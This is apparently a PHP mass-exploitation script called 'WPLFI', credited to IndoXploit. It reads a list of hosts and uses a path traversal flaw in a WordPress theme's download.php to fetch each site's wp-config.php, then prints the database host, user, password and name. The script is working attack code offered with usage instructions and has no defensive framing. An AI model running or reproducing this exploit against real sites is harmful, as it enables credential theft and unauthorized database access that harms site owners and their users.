WPLFI

1. <?php
2. /*
3. mail : [email protected]
4. How To Usage This Script
5. c:\root\php>php this.php list.txt
6. */
7.  @error_reporting(0);
8. @set_time_limit(0);
9. print "
10. Thx To CodersLeet - IndoXploit
11. " ;
12.  
13.  
14. $g=@file_get_contents($argv[1]);
15. $ss=explode("\r\n",$g);
16. $open=fopen("result.html","a");
17.  
18.  
19. foreach ($ss as $links){
20.   $lofe="http://$links/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php";
21.   $gg=@file_get_contents($lofe);
22.   if(preg_match("#<?php#",$gg)){
23.      echo "\n[+] $links ==> infected\n";
24.  
25.      preg_match ("#define\('DB_HOST', '(.*?)'\);#i", $gg, $f);
26.      echo "\t\t[!] DB_HOST : ". $f[1]. "\n";
27.  
28.         preg_match ("#define\('DB_USER', '(.*?)'\);#i", $gg, $f) ;
29.         echo "\t\t[!] DB_USER : ". $f[1]. "\n";
30.  
31.         preg_match ("#define\('DB_PASSWORD', '(.*?)'\);#i", $gg, $f)  ;
32.         echo "\t\t[!] DB_PASSWORD : ". $f[1]. "\n";
33.  
34.         preg_match ("#define\('DB_NAME', '(.*?)'\);#i", $gg, $f) ;
35.         echo "\t\t[!] DB_NAME : ". $f[1]. "\n";
36.   }else{
37.     echo "\n[+] $links ==> Not infected\n";
38.   }
39. }
40. fclose($open);
41. ?>